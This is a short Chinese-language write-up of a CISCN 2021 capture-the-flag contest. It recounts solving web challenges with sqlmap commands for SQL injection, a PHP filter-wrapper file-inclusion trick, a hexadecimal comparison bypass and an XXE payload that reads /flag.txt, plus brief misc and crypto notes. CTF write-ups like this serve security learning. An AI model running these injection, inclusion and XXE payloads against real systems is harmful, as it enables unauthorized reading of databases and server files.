WP-CISCN2021
谢高峯
前言
这次比赛让我看到只学习一门方向的痛苦。web平台修复,队友在疯狂做题,你却只能在旁边看着却不能帮助。有些题就是悍得悍死,捞得捞死。
Web
简单的注入
一道延时注入,我却在反复测试是否为联合还是其他注入,尝试fuzz,手工注入真的菜。
还是得靠sqlmap注入
Payload:
爆库:sqlmap.py –r txt –risk=3 --level=3 –p password –dbs
爆表:sqlmap.py –r txt –risk=3 –-level=3 –p password –D “数据库名” –-tables
爆列:sqlmap.py –r txt –risk=3 –level=3 –p password –D “数据库名” –T “数据表名” –-columns
Be_Careful
还是做题太少,不能一下子秒掉。
一道伪协议题,url显示file=1.php,尝试查看源码,filter协议查看index得到源码
Be Careful';} $file=$_GET['file']; if(strstr($file,"../")||stristr($file, "tp")||stristr($file,'F14ggg.php')||stristr($file,"input")||stristr($file,"data")){ echo "I advise you to do good!"; exit(); } include($file); //real_flag.php ?>
再用base64对real_flag.php进行编码,得到real_flag.php的源码。
/**include('F14ggg.php');
$a = $_GET['a'];
$one = ord('1'); //49
$nine = ord('9'); //57
$number = '69563214562';
for ($i = 0; $i < strlen($number); $i++){
$digit = ord($a{$i}); echo $digit;
if( ($digit >= $one) && ($digit <= $nine) )
{echo 'wrong';}
elseif($number == $a){echo $flag;
?>**/
所以将number的数转16进制
Payload:
url/real_flag.php?a=0x10324a6ae2
flagin
一道XXE外部漏洞的题,源题。
可以转载到该网址做这道题,只不过加了waf。
原题
利用师傅Payload,往XXE外部增加伪协议。
<!DOCTYPE ANY [
<!ENTITY test SYSTEM "php://filter/read=convert.base64-encode/resource=/flag.txt"
]>
<user><username>&test;</username><password>123</password></user>
Misc
签到_misc
直接利用exe扫码,得到flag
Crypto
Sign me up
一大串编码,看到后面==,一直进行base64解码得到flag
总结
知不足,然后自反也
类似资料: